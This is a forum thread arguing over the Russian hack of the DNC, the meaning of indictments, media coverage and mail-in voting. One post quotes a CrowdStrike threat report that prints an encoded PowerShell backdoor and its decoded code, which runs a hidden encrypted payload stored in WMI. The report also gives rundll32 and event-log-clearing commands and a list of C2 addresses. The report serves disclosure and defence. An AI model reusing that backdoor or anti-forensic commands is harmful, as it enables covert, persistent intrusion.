Hidden Over 2 Years: Dem Cyber-Firm's Sworn Testimony It Had No Proof of Russian Hack of DNC

[AUDub 11,131]

14 minutes ago, I_M4_AU said:

Ole Tom can’t be serious.  “If the media chases every one of these as bombshell, they’re going to end up being a functioning arm of the Trump campaign“.  Do you really believe the media (other than FOX) will actually investigate these bombshells in a unbiased manner?

Trump didn't have to campaign very hard in 2016. Hillary crushed him in ad spending and the like. CNN, NYT, etc. gave him all the airtime he would ever need, and elevated Hillary's supposed crimes in such a way that a lot of people that usually vote D stayed home. That, along with the Trump campaign's excellent decision to target the supposedly solid blue rust belt,  won him the presidency. 

Scariest thing is that the media doesn't seem to have learned the lesson. 

[AUDub 11,131]

They'll chase everything the Trump campaign drops out like a cat chasing a laser pointer, lending legitimacy to stuff that is quite obviously bull****.

And why is that?

Ratings and clicks, my dear boy, which is all they care about. 

[wdefromtx 3,159]

6 minutes ago, AUDub said:

They'll chase everything the Trump campaign drops out like a cat chasing a laser pointer, lending legitimacy to stuff that is quite obviously bull****.

And why is that?

Ratings and clicks, my dear boy, which is all they care about. 

Get those ratings....besides it isn't the medias job to report accurately anyways. Or so I have been told on here.......lol

[AUDub 11,131]

3 minutes ago, wdefromtx said:

Get those ratings....besides it isn't the medias job to report accurately anyways. Or so I have been told on here.......lol

I think, with some exceptions, rank and file reporters are decent folks that want to do right by their readership.

The people higher up the chain on the other hand, people like Haberman at the NYT or Zucker at CNN, are universally idiots.

[DKW 86 7,410]

12 hours ago, AUDub said:

It's a "formal accusation of a serious crime," and and extremely compelling one, given that Mueller laid out his case extremely effectively therein. Not that I expected anything less than a handwave from you.

No, it's not. It is an okay to pursue more information or let the situation drop. 
You know: "You can indict a ham sandwich."
Ham sandwiches cant even perform serious crimes...😉

"Just" an indictment. LOL. What utter claptrap 

An indictment and $6 gets you a Venti Caramel Frappucino @ Starbucks...

You are keeping me entertained today tho...

[wdefromtx 3,159]

1 minute ago, DKW 86 said:

An indictment and $6 gets you a Venti Caramel Frappucino @ Starbucks...

I prefer the Strawberry Açaí Refresher personally. lol 

[AUDub 11,131]

4 minutes ago, DKW 86 said:

No, it's not. It is an okay to pursue more information or let the situation drop. 
You know: "You can indict a ham sandwich."
Ham sandwiches cant even perform serious crimes...😉

That is the dictionary definition of the word indictment. So the argument you're going with is to simply ignore it? Noted. 

[DKW 86 7,410]

15 hours ago, AUDub said:

Like hell it is. 

I literally linked the indictment for you. Read it. Absorb it. This should all become clear at that point.

Read the Mueller report too. In fact, do a word search for Crowdstrike through the PDF. You'll find two mentions. In the footnotes. 

Crowdstrike is a red herring. 

You're speaking out of your depth. You have no idea how IT forensic investigations work, otherwise you'd know why this line of argument is bull****. I've performed forensic investigations on many pieces of networked medical equipment in my capacity as a clinical engineer.

Hell, the FBI contracts a ton of work to entities like Crowdstrike, including, get this, Crowdstrike, with regularity. Investigating a hack isn’t like investigating a murder. The Russians didn’t leave DNA evidence on the server racks and fingerprints on the keyboards. All the evidence of their comings and goings was on the computer hard drives, in memory, and in the ephemeral network transmissions to and from other locations.

The FBI made an unusual request, likely because they wanted access while the Russians were still there. They got their images, all the same data the Crowdstrike had access to, eventually. Their findings, in addition to others with additional evidence, confirmed the fact that the GRU is involved.

For the love of God, read the indictment I linked.

Read the forward the Nation put on top of that article. VIPS' take is quite controversial (controversial is me being charitable,  as they're flat wrong),  and the Nation even ran it by a cybersecurity expert that said VIPS conclusion was erroneous.

Hosting and management are two separate things. Even that slate article gets it wrong. The email server is not a single monolithic machine or set of machines in DNC offices. It's spread out among 140 AWS servers connected by a fiber backbone. This is a hard fact.

For the love of God, read the damned indictment I linked.

https://t.co/CofJpydBuQ?amp=1

Pages 6-13 lay it out easily enough for a layman, and page 11 details the dates and the location of the GRU leased server. 

What the hell do you think the internet is? A series of tubes?

It's hard to argue with you when you don't even have a fundamental understanding of what you're arguing. 

Look moron...I do IT for a living, at the Fortune 50 Level. I understand totally that you are trying to redefine words etc. The FBI has tools and people that do forensics in IT. They do it all the time. Why was no criminal investigative org given 100% full access to the hardware? Just answer that one. 

Crowdstrike says it has no evidence of anything. I think YOU are the one having problems reading. I assure you, I am not. 

And just so we are crystal clear, what some software/used car/furniture/penny pincher ad salesman says could not interest me in the least.

[DKW 86 7,410]

6 minutes ago, AUDub said:

That is the dictionary definition of the word indictment. So the argument you're going with is to simply ignore it? Noted. 

No, I am telling you the truth and it doesnt fit with your little narrative and you cant handle it. 
An indictment can mean many things, it could mean we are on our way!..to not really enough there. 
It can literally take next to nothing get an indictment.
The Process is so lopsided, the Defendant has no rights in the Indictment Process. They cant challenge anything said etc.
You can also use testimony that is completely inadmissible in court to get an Indictment. 

But you know all this, and that's why you googled up that crazy definition of an indictment. 

[wdefromtx 3,159]

I’m not picking sides here, but all I know is to get an indictment all that is really needed is a friendly judge....

 

Things I’ve learned while stuck staying at home all the time....

 

#LawandOrderSVU

lol

[AUDub 11,131]

1 hour ago, DKW 86 said:

Look moron...I do IT for a living, at the Fortune 50 Level

I know you work in IT! Hell, I hold multiple Healthcare IT certifications from your employer!

Part of why the fact you're getting so much of it wrong here is so flipping strange!

Quote

I understand totally that you are trying to redefine words etc.

Just because you don't know the definition of the word indictment doesn't mean I'm trying to redifine it. Mueller made his case, which I keep linking and begging you to read. If they ever step foot on American soil, they will likely be arrested.  These guys have been formally charged, though they will probably never be tried. 

Quote

The FBI has tools and people that do forensics in IT. They do it all the time. Why was no criminal investigative org given 100% full access to the hardware? Just answer that one. 

This is actually very common practice! 

https://www.theverge.com/2017/1/5rbb/14178806/fbi-dnc-hack-server-examined-forensics-russia

Quote

The answer might be more than you think. It’s common for the initial forensic analysis to be conducted by outside firms like CrowdStrike, and once that data has been copied, there’s often little need to copy it again. BuzzFeed described the FBI’s lack of interest in the DNC’s server as unusual, citing a number of response firms that preferred not to be named. But that’s not a unanimous opinion, and two experts contacted by The Verge disagreed that it was unusual.

“This is normal practice,” says Matt Tait, founder and CEO of Capital Alpha Security. “In cases like this, the onus for digital forensics is on the third-party contracted by the company that's calling in the incident response team, in this case CrowdStrike.”dd

 

Quote

Crowdstrike says it has no evidence of anything. I think YOU are the one having problems reading. I assure you, I am not. 

No they said they didn't see any evidence of exfiltration. They did find Fancy Bear and Cozy Bear had infiltrated the server.

https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/

Quote

By Dmitri Alperovitch

There is rarely a dull day at CrowdStrike where we are not detecting or responding to a breach at a company somewhere around the globe. In all of these cases, we operate under strict confidentiality rules with our customers and cannot reveal publicly any information about these attacks. But on rare occasions, a customer decides to go public with information about their incident and give us permission to share our knowledge of the adversary tradecraft with the broader community and help protect even those who do not happen to be our customers. This story is about one of those cases.

CrowdStrike Services Inc., our Incident Response group, was called by the Democratic National Committee (DNC), the formal governing body for the US Democratic Party, to respond to a suspected breach. We deployed our IR team and technology and immediately identified two sophisticated adversaries on the network – COZY BEAR and FANCY BEAR. We’ve had lots of experience with both of these actors attempting to target our customers in the past and know them well. In fact, our team considers them some of the best threat actors out of all the numerous nation-state, criminal and hacktivist/terrorist groups we encounter on a daily basis. Their tradecraft is superb, operational security second to none and the extensive usage of ‘living-off-the-land’ techniques enables them to easily bypass many security solutions they encounter. In particular, we identified advanced methods consistent with nation-state level capabilities including deliberate targeting and ‘access management’ tradecraft – both groups were constantly going back into the environment to change out their implants, modify persistent methods, move to new Command & Control channels and perform other tasks to try to stay ahead of being detected. Both adversaries engage in extensive political and economic espionage for the benefit of the government of the Russian Federation and are believed to be closely linked to the Russian government’s powerful and highly capable intelligence services.

COZY BEAR (also referred to in some industry reports as CozyDuke or APT 29) is the adversary group that last year successfully infiltrated the unclassified networks of the White House, State Department, and US Joint Chiefs of Staff. In addition to the US government, they have targeted organizations across the Defense, Energy, Extractive, Financial, Insurance, Legal, Manufacturing Media, Think Tanks, Pharmaceutical, Research and Technology industries, along with Universities. Victims have also been observed in Western Europe, Brazil, China, Japan, Mexico, New Zealand, South Korea, Turkey and Central Asian countries. COZY BEAR’s preferred intrusion method is a broadly targeted spearphish campaign that typically includes web links to a malicious dropper. Once executed on the machine, the code will deliver one of a number of sophisticated Remote Access Tools (RATs), including AdobeARM, ATI-Agent, and MiniDionis. On many occasions, both the dropper and the payload will contain a range of techniques to ensure the sample is not being analyzed on a virtual machine, using a debugger, or located within a sandbox. They have extensive checks for the various security software that is installed on the system and their specific configurations. When specific versions are discovered that may cause issues for the RAT, it promptly exits. These actions demonstrate a well-resourced adversary with a thorough implant-testing regime that is highly attuned to slight configuration issues that may result in their detection, and which would cause them to deploy a different tool instead. The implants are highly configurable via encrypted configuration files, which allow the adversary to customize various components, including C2 servers, the list of initial tasks to carry out, persistence mechanisms, encryption keys and others. An HTTP protocol with encrypted payload is used for the Command & Control communication.

FANCY BEAR (also known as Sofacy or APT 28) is a separate Russian-based threat actor, which has been active since mid 2000s, and has been responsible for targeted intrusion campaigns against the Aerospace, Defense, Energy, Government and Media sectors. Their victims have been identified in the United States, Western Europe, Brazil, Canada, China, Georgia, Iran, Japan, Malaysia and South Korea. Extensive targeting of defense ministries and other military victims has been observed, the profile of which closely mirrors the strategic interests of the Russian government, and may indicate affiliation with Главное Разведывательное Управление (Main Intelligence Department) or GRU, Russia’s premier military intelligence service. This adversary has a wide range of implants at their disposal, which have been developed over the course of many years and include Sofacy, X-Agent, X-Tunnel, WinIDS, Foozer and DownRage droppers, and even malware for Linux, OSX, IOS, Android and Windows Phones. This group is known for its technique of registering domains that closely resemble domains of legitimate organizations they plan to target. Afterwards, they establish phishing sites on these domains that spoof the look and feel of the victim’s web-based email services in order to steal their credentials. FANCY BEAR has also been linked publicly to intrusions into the German Bundestag and France’s TV5 Monde TV station in April 2015.

At DNC, COZY BEAR intrusion has been identified going back to summer of 2015, while FANCY BEAR separately breached the network in April 2016. We have identified no collaboration between the two actors, or even an awareness of one by the other.  Instead, we observed the two Russian espionage groups compromise the same systems and engage separately in the theft of identical credentials. While you would virtually never see Western intelligence agencies going after the same target without de-confliction for fear of compromising each other’s operations, in Russia this is not an uncommon scenario. “Putin’s Hydra: Inside Russia’s Intelligence Services”, a recent paper from European Council on Foreign Relations, does an excellent job outlining the highly adversarial relationship between Russia’s main intelligence services – Федеральная Служба Безопасности (FSB), the primary domestic intelligence agency but one with also significant external collection and ‘active measures’  remit, Служба Внешней Разведки (SVR), the primary foreign intelligence agency, and the aforementioned GRU. Not only do they have overlapping areas of responsibility, but also rarely share intelligence and even occasionally steal sources from each other and compromise operations. Thus, it is not surprising to see them engage in intrusions against the same victim, even when it may be a waste of resources and lead to the discovery and potential compromise of mutual operations.

The COZY BEAR intrusion relied primarily on the SeaDaddy implant developed in Python and compiled with py2exe and another Powershell backdoor with persistence accomplished via Windows Management Instrumentation (WMI) system, which allowed the adversary to launch malicious code automatically after a specified period of system uptime or on a specific schedule. The Powershell backdoor is ingenious in its simplicity and power. It consists of a single obfuscated command setup to run persistently, such as:

powershell.exe -NonInteractive -ExecutionPolicy Bypass -EncodedCommand ZgB1AG4AYwB0AGkAbwBuACAAcABlAHIAZgBDAHIAKAAkAGMAcgBUAHIALAAgACQAZABhAHQAYQApAA0ACgB7AA0ACgAJACQAcgBlAHQAIAA9ACAAJABuAHUAbABsAA0ACgAJAHQAcgB5AHsADQAKAAkACQAkAG0AcwAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQANAAoACQAJACQAYwBzACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAFMAZQBjAHUAcgBpAHQAeQAuAEMAcgB5AHAAdABvAGcAcgBhAHAAaAB5AC4AQwByAHkAcAB0AG8AUwB0AHIAZQBhAG0AIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAQAAoACQAbQBzACwAIAAkAGMAcgBUAHIALAAgAFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAEMAcgB5AHAAdABvAFMAdAByAGUAYQBtAE0AbwBkAGUAXQA6ADoAVwByAGkAdABlACkADQAKAAkACQAkAGMAcwAuAFcAcgBpAHQAZQAoACQAZABhAHQAYQAsACAAMAAsACAAJABkAGEAdABhAC4ATABlAG4AZwB0AGgAKQANAAoACQAJACQAYwBzAC4ARgBsAHUAcwBoAEYAaQBuAGEAbABCAGwAbwBjAGsAKAApAA0ACgAJAAkAJAByAGUAdAAgAD0AIAAkAG0AcwAuAFQAbwBBAHIAcgBhAHkAKAApAA0ACgAJAAkAJABjAHMALgBDAGwAbwBzAGUAKAApAA0ACgAJAAkAJABtAHMALgBDAGwAbwBzAGUAKAApAA0ACgAJAH0ADQAKAAkAYwBhAHQAYwBoAHsAfQANAAoACQByAGUAdAB1AHIAbgAgACQAcgBlAHQADQAKAH0ADQAKAA0ACgBmAHUAbgBjAHQAaQBvAG4AIABkAGUAYwByAEEAZQBzACgAJABlAG4AYwBEAGEAdABhACwAIAAkAGsAZQB5ACwAIAAkAGkAdgApAA0ACgB7AA0ACgAJACQAcgBlAHQAIAA9ACAAJABuAHUAbABsAA0ACgAJAHQAcgB5AHsADQAKAAkACQAkAHAAcgBvAHYAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4AUwBlAGMAdQByAGkAdAB5AC4AQwByAHkAcAB0AG8AZwByAGEAcABoAHkALgBSAGkAagBuAGQAYQBlAGwATQBhAG4AYQBnAGUAZAANAAoACQAJACQAcAByAG8AdgAuAEsAZQB5ACAAPQAgACQAawBlAHkADQAKAAkACQAkAHAAcgBvAHYALgBJAFYAIAA9ACAAJABpAHYADQAKAAkACQAkAGQAZQBjAHIAIAA9ACAAJABwAHIAbwB2AC4AQwByAGUAYQB0AGUARABlAGMAcgB5AHAAdABvAHIAKAAkAHAAcgBvAHYALgBLAGUAeQAsACAAJABwAHIAbwB2AC4ASQBWACkADQAKAAkACQAkAHIAZQB0ACAAPQAgAHAAZQByAGYAQwByACAAJABkAGUAYwByACAAJABlAG4AYwBEAGEAdABhAA0ACgAJAH0ADQAKAAkAYwBhAHQAYwBoAHsAfQANAAoACQByAGUAdAB1AHIAbgAgACQAcgBlAHQADQAKAH0ADQAKAA0ACgBmAHUAbgBjAHQAaQBvAG4AIABzAFcAUAAoACQAYwBOACwAIAAkAHAATgAsACAAJABhAEsALAAgACQAYQBJACkADQAKAHsADQAKAAkAaQBmACgAJABjAE4AIAAtAGUAcQAgACQAbgB1AGwAbAAgAC0AbwByACAAJABwAE4AIAAtAGUAcQAgACQAbgB1AGwAbAApAHsAcgBlAHQAdQByAG4AIAAkAGYAYQBsAHMAZQB9AA0ACgAJAHQAcgB5AHsADQAKAAkACQAkAHcAcAAgAD0AIAAoAFsAdwBtAGkAYwBsAGEAcwBzAF0AJABjAE4AKQAuAFAAcgBvAHAAZQByAHQAaQBlAHMAWwAkAHAATgBdAC4AVgBhAGwAdQBlAA0ACgAJAAkAJABlAHgARQBuACAAPQAgAFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJAB3AHAAKQANAAoACQAJACQAZQB4AEQAZQBjACAAPQAgAGQAZQBjAHIAQQBlAHMAIAAkAGUAeABFAG4AIAAkAGEASwAgACQAYQBJAA0ACgAJAAkAJABlAHgAIAA9ACAAWwBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAZQB4AEQAZQBjACkADQAKAAkACQBpAGYAKAAkAGUAeAAgAC0AZQBxACAAJABuAHUAbABsACAALQBvAHIAIAAkAGUAeAAgAC0AZQBxACAAJwAnACkADQAKAAkACQB7AHIAZQB0AHUAcgBuAH0ADQAKAAkACQBJAG4AdgBvAGsAZQAtAEUAeABwAHIAZQBzAHMAaQBvAG4AIAAkAGUAeAANAAoACQAJAHIAZQB0AHUAcgBuACAAJAB0AHIAdQBlAA0ACgAJAH0ADQAKAAkAYwBhAHQAYwBoAHsADQAKAAkACQByAGUAdAB1AHIAbgAgACQAZgBhAGwAcwBlAA0ACgAJAH0ADQAKAH0ADQAKAA0ACgAkAGEAZQBLACAAPQAgAFsAYgB5AHQAZQBbAF0AXQAgACgAMAB4AGUANwAsACAAMAB4AGQANgAsACAAMAB4AGIAZQAsACAAMAB4AGEAOQAsACAAMAB4AGIANwAsACAAMAB4AGUANgAsACAAMAB4ADUANQAsACAAMAB4ADMAYQAsACAAMAB4AGUAZQAsACAAMAB4ADEANgAsACAAMAB4ADcAOQAsACAAMAB4AGMAYQAsACAAMAB4ADUANgAsACAAMAB4ADAAZgAsACAAMAB4AGIAYwAsACAAMAB4ADMAZgAsACAAMAB4ADIAMgAsACAAMAB4AGUAZAAsACAAMAB4AGYAZgAsACAAMAB4ADAAMgAsACAAMAB4ADQAMwAsACAAMAB4ADQAYwAsACAAMAB4ADEAYgAsACAAMAB4AGMAMAAsACAAMAB4AGUANwAsACAAMAB4ADUANwAsACAAMAB4AGIAMgAsACAAMAB4AGMAYgAsACAAMAB4AGQAOAAsACAAMAB4AGMAZQAsACAAMAB4AGQAYQAsACAAMAB4ADAAMAApAA0ACgAkAGEAZQBJACAAPQAgAFsAYgB5AHQAZQBbAF0AXQAgACgAMAB4AGIAZQAsACAAMAB4ADcAYQAsACAAMAB4ADkAMAAsACAAMAB4AGQAOQAsACAAMAB4AGQANQAsACAAMAB4AGYANwAsACAAMAB4AGEAYQAsACAAMAB4ADYAZAAsACAAMAB4AGUAOQAsACAAMAB4ADEANgAsACAAMAB4ADYANAAsACAAMAB4ADEAZAAsACAAMAB4ADkANwAsACAAMAB4ADEANgAsACAAMAB4AGMAMAAsACAAMAB4ADYANwApAA0ACgBzAFcAUAAgACcAVwBtAGkAJwAgACcAVwBtAGkAJwAgACQAYQBlAEsAIAAkAGEAZQBJACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA=

 

This decodes to:

function perfCr($crTr, $data){
$ret = $null
try{
$ms = New-Object System.IO.MemoryStream
$cs = New-Object System.Security.Cryptography.CryptoStream -ArgumentList @($ms, $crTr, [System.Security.Cryptography.CryptoStreamMode]::Write)
$cs.Write($data, 0, $data.Length)
$cs.FlushFinalBlock()
$ret = $ms.ToArray()
$cs.Close()
$ms.Close()
}
catch{}
return $ret
}
function decrAes($encData, $key, $iv)
{
$ret = $null
try{
$prov = New-Object System.Security.Cryptography.RijndaelManaged
$prov.Key = $key
$prov.IV = $iv
$decr = $prov.CreateDecryptor($prov.Key, $prov.IV)
$ret = perfCr $decr $encData
}
Catch{}
return $ret
}
function sWP($cN, $pN, $aK, $aI)
{
if($cN -eq $null -or $pN -eq $null){return $false}
try{
$wp = ([wmiclass]$cN).Properties[$pN].Value
$exEn = [Convert]::FromBase64String($wp)
$exDec = decrAes $exEn $aK $aI
$ex = [Text.Encoding]::UTF8.GetString($exDec)
if($ex -eq $null -or $ex -eq ”)
{return}
Invoke-Expression $ex
return $true
}
catch{
return $false
}
}
$aeK = [byte[]] (0xe7, 0xd6, 0xbe, 0xa9, 0xb7, 0xe6, 0x55, 0x3a, 0xee, 0x16, 0x79, 0xca, 0x56, 0x0f, 0xbc, 0x3f, 0x22, 0xed, 0xff, 0x02, 0x43, 0x4c, 0x1b, 0xc0, 0xe7, 0x57, 0xb2, 0xcb, 0xd8, 0xce, 0xda, 0x00)
$aeI = [byte[]] (0xbe, 0x7a, 0x90, 0xd9, 0xd5, 0xf7, 0xaa, 0x6d, 0xe9, 0x16, 0x64, 0x1d, 0x97, 0x16, 0xc0, 0x67)
sWP ‘Wmi’ ‘Wmi’ $aeK $aeI | Out-Null

This one-line powershell command, stored only in WMI database, establishes an encrypted connection to C2 and downloads additional powershell modules from it, executing them in memory. In theory, the additional modules can do virtually anything on the victim system. The encryption keys in the script were different on every system. Powershell version of credential theft tool MimiKatz was also used by the actors to facilitate credential acquisition for lateral movement purposes.

FANCY BEAR adversary used different tradecraft, deploying X-Agent malware with capabilities to do remote command execution, file transmission and keylogging. It was executed via rundll32 commands such as:

rundll32.exe “C:\Windows\twain_64.dll”

In addition, FANCY BEAR’s X-Tunnel network tunneling tool, which facilitates connections to NAT-ed environments, was used to also execute remote commands. Both tools were deployed via RemCOM, an open-source replacement for PsExec available from GitHub. They also engaged in a number of anti-forensic analysis measures, such as periodic event log clearing (via wevtutil cl System and wevtutil cl Security commands) and resetting timestamps of files.

Intelligence collection directed by nation state actors against US political targets provides invaluable insight into the requirements directed upon those actors. Regardless of the agency or unit tasked with this collection, the upcoming US election, and the associated candidates and parties are of critical interest to both hostile and friendly nation states. The 2016 presidential election has the world’s attention, and leaders of other states are anxiously watching and planning for possible outcomes. Attacks against electoral candidates and the parties they represent are likely to continue up until the election in November.

Indicators of Compromise:

IOC	Adversary	IOC Type	Additional Info
6c1bce76f4d2358656132b6b1d471571820688ccdbaca0d86d0ca082b9390536	COZY BEAR	SHA256	pagemgr.exe (SeaDaddy implant)
b101cd29e18a515753409ae86ce68a4cedbe0d640d385eb24b9bbb69cf8186ae	COZY BEAR	SHA256	pagemgr.exe   (SeaDaddy implant)
185[.]100[.]84[.]134:443	COZY BEAR	C2	SeaDaddy implant C2
58[.]49[.]58[.]58:443	COZY BEAR	C2	SeaDaddy implant C2
218[.]1[.]98[.]203:80	COZY BEAR	C2	Powershell implant C2
187[.]33[.]33[.]8:80	COZY BEAR	C2	Powershell implant C2
fd39d2837b30e7233bc54598ff51bdc2f8c418fa5b94dea2cadb24cf40f395e5	FANCY BEAR	SHA256	twain_64.dll   (64-bit X-Agent implant)
4845761c9bed0563d0aa83613311191e075a9b58861e80392914d61a21bad976	FANCY BEAR	SHA256	VmUpgradeHelper.exe (X-Tunnel implant)
40ae43b7d6c413becc92b07076fa128b875c8dbb4da7c036639eccf5a9fc784f	FANCY BEAR	SHA256	VmUpgradeHelper.exe   (X-Tunnel implant)
185[.]86[.]148[.]227:443	FANCY BEAR	C2	X-Agent implant C2
45[.]32[.]129[.]185:443	FANCY BEAR	C2	X-Tunnel implant C2
23[.]227[.]196[.]217:443	FANCY BEAR	C2	X-Tunnel implant C2

Hell, the FBI knew Cozy Bear was there before the DNC did, and 7 months before Crowdstrike was contracted. Pages 26 and 27.

https://www.google.com/url?sa=t&source=web&rct=j&url=https://intelligence.house.gov/uploadedfiles/ty54.pdf&ved=2ahUKEwjSnojlh7TpAhWuneAKHZNFCREQFnoECAQQAA&usg=AOvVaw0qejyJ6AgIsCddRqwjT-Zm

But the evidence is more broad than that! Read the indictment!

[AUDub 11,131]

2 hours ago, DKW 86 said:

No, I am telling you the truth and it doesnt fit with your little narrative and you cant handle it. 

No, you are not. You're attempting to handwave away a compelling piece of evidence.

Quote

An indictment can mean many things, it could mean we are on our way!..to not really enough there. 

No it means they have been criminally charged. Not much else to do besides try them in the court of law. 

Quote

It can literally take next to nothing get an indictment.

It can! But I'm not asking you to weigh the evidence contained therein because it's an indictment! 

Quote

The Process is so lopsided, the Defendant has no rights in the Indictment Process. They cant challenge anything said etc.
You can also use testimony that is completely inadmissible in court to get an Indictment. 

That's because an indictment is returned when the state makes its case before the grand jury. Defendants don't get a say.

But that's why they get a trial.

But, again, I'm not asking you to weigh the evidence contained therein because it's an indictment! 

Quote

But you know all this, and that's why you googled up that crazy definition of an indictment. 

It's not a crazy definition at all. That's literally what an indictment is in Common Law!

[I_M4_AU 7,762]

3 hours ago, AUDub said:

Trump didn't have to campaign very hard in 2016. Hillary crushed him in ad spending and the like. CNN, NYT, etc. gave him all the airtime he would ever need, and elevated Hillary's supposed crimes in such a way that a lot of people that usually vote D stayed home. That, along with the Trump campaign's excellent decision to target the supposedly solid blue rust belt,  won him the presidency. 

Scariest thing is that the media doesn't seem to have learned the lesson. 

I think this time around even though Trump will blast the news about Biden involved in the Russia Hoax and the media will have to pay some attention to it, I think the media will hit the Coronavirus response and recovery (or 2n wave as he case maybe) hard without let up.  The public may get tired of that by October, but I’m sure Biden’s campaign will keep it in the news.

If this House bill gets anything close to what they ask for, there will be millions of new voters (new citizens that were illegal aliens) that just got free money from Nancy.  That coupled with the mail-in ballots, how could Biden lose?

[wdefromtx 3,159]

16 minutes ago, I_M4_AU said:

I think this time around even though Trump will blast the news about Biden involved in the Russia Hoax and the media will have to pay some attention to it, I think the media will hit the Coronavirus response and recovery (or 2n wave as he case maybe) hard without let up.  The public may get tired of that by October, but I’m sure Biden’s campaign will keep it in the news.

If this House bill gets anything close to what they ask for, there will be millions of new voters (new citizens that were illegal aliens) that just got free money from Nancy.  That coupled with the mail-in ballots, how could Biden lose?

I haven't looked yet all they way, but did they try to wrap in mail voting? Ugh. 

 

Their bill is DOA in the Senate anyways. 

[I_M4_AU 7,762]

18 minutes ago, wdefromtx said:

I haven't looked yet all they way, but did they try to wrap in mail voting? Ugh. 

 

Their bill is DOA in the Senate anyways. 

The funding is meant to assist states in addressing new challenges posed by holding elections during the COVID-19 pandemic, such as expanding mail-in and early in-person voting.

https://thehill.com/policy/cybersecurity/497375-house-democrats-include-36-billion-for-mail-in-voting-in-new-stimulus

You’re right, Mitch will shut this down.

[wdefromtx 3,159]

1 minute ago, I_M4_AU said:

The funding is meant to assist states in addressing new challenges posed by holding elections during the COVID-19 pandemic, such as expanding mail-in and early in-person voting.

https://thehill.com/policy/cybersecurity/497375-house-democrats-include-36-billion-for-mail-in-voting-in-new-stimulus

You’re right, Mitch will shut this down.

My solution is and has been a system where you can request a ballot to be sent to you and then you can bring it to the polls in a contactless or drive through drop off type  of situation. That way it helps protect against the virus and you still get physical presence for voting. 

[I_M4_AU 7,762]

1 minute ago, wdefromtx said:

My solution is and has been a system where you can request a ballot to be sent to you and then you can bring it to the polls in a contactless or drive through drop off type  of situation. That way it helps protect against the virus and you still get physical presence for voting. 

That would work for the most vulnerable, say 60+, otherwise social distance and wear a mask.  Just too much room for nefarious activity.

[wdefromtx 3,159]

2 minutes ago, I_M4_AU said:

That would work for the most vulnerable, say 60+, otherwise social distance and wear a mask.  Just too much room for nefarious activity.

Exactly. Also, remember the USPS doesn't exactly have a stellar rating on getting mail to their destination sometimes. LOL

[DKW 86 7,410]

3 hours ago, AUDub said:

I know you work in IT! Hell, I hold multiple Healthcare IT certifications from your employer!

Part of why the fact you're getting so much of it wrong here is so flipping strange!

Just because you don't know the definition of the word indictment doesn't mean I'm trying to redifine it. Mueller made his case, which I keep linking and begging you to read. If they ever step foot on American soil, they will likely be arrested.  These guys have been formally charged, though they will probably never be tried. 

This is actually very common practice! 

https://www.theverge.com/2017/1/5rbb/14178806/fbi-dnc-hack-server-examined-forensics-russia

 

No they said they didn't see any evidence of exfiltration. They did find Fancy Bear and Cozy Bear had infiltrated the server.

https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/

Hell, the FBI knew Cozy Bear was there before the DNC did, and 7 months before Crowdstrike was contracted. Pages 26 and 27.

https://www.google.com/url?sa=t&source=web&rct=j&url=https://intelligence.house.gov/uploadedfiles/ty54.pdf&ved=2ahUKEwjSnojlh7TpAhWuneAKHZNFCREQFnoECAQQAA&usg=AOvVaw0qejyJ6AgIsCddRqwjT-Zm

But the evidence is more broad than that! Read the indictment!

Actually, you are right about this.
The FBI went to the Sierra Foxtrots at the DNC and told them, some as many as 6X, that there was malware on the server. 
The DNC did ZERO. Took no action at all. Not even PW resets.
I have no sympathy for people that are warned repeatedly and still do nothing and then want to have a whine and cheese party when what they were warned about blows up in their faces. But this is true. THE DNC WAS WARNED REPEATEDLY BY THE FBI BEFORE THE HACK BECAME FRONTPAGE NEWS. THEY DID ABSOLUTELY NOTHING. ZERO. COMPLETELY IGNORED THE FBI.

When you are this pathetic and you get blown up, well, it sucks to be you. 

https://www.thedailybeast.com/cheats/2016/12/13/dnc-blew-off-fbi-hack-warnings

https://www.cnn.com/2016/07/25/politics/democratic-convention-dnc-emails-russia/index.html

https://themoscowproject.org/collusion/fbi-informs-dnc-russian-hacking/

https://thehill.com/policy/national-security/313555-comey-fbi-did-request-access-to-hacked-dnc-servers

*** Going back to 2015, The FBI was telling the DNC they were being hacked. And they did nothing.

 

[DKW 86 7,410]

2 hours ago, AUDub said:

No, you are not. You're attempting to handwave away a compelling piece of evidence.

An indictment is not a compelling piece of evidence. It is a request for charges to be brought. It is COMPLETELY unchallenged.
No rules of evidence apply, none.
No rules of testifying. You cant even use some testimony used to get an indictment in the trial. I 
No challenging any one about anything. 
No presence of the Defense there whatsoever. 
No Cross-examination.  

No it means they have been criminally charged. Not much else to do besides try them in the court of law. 

COMPLETELY WRONG. Often, half or more of a case is built AFTER the Indictment. 
Do you realize that some or possibly even most evidence used in an Indictment might not be usable in a court of law???

It can! But I'm not asking you to weigh the evidence contained therein because it's an indictment! 
That's because an indictment is returned when the state makes its case before the grand jury. Defendants don't get a say.

But that's why they get a trial.

But, again, I'm not asking you to weigh the evidence contained therein because it's an indictment! 

It's not a crazy definition at all. That's literally what an indictment is in Common Law!

 

Quote

 

https://www.justice.gov/usao/justice-101/charging

Definition from the DOJ.

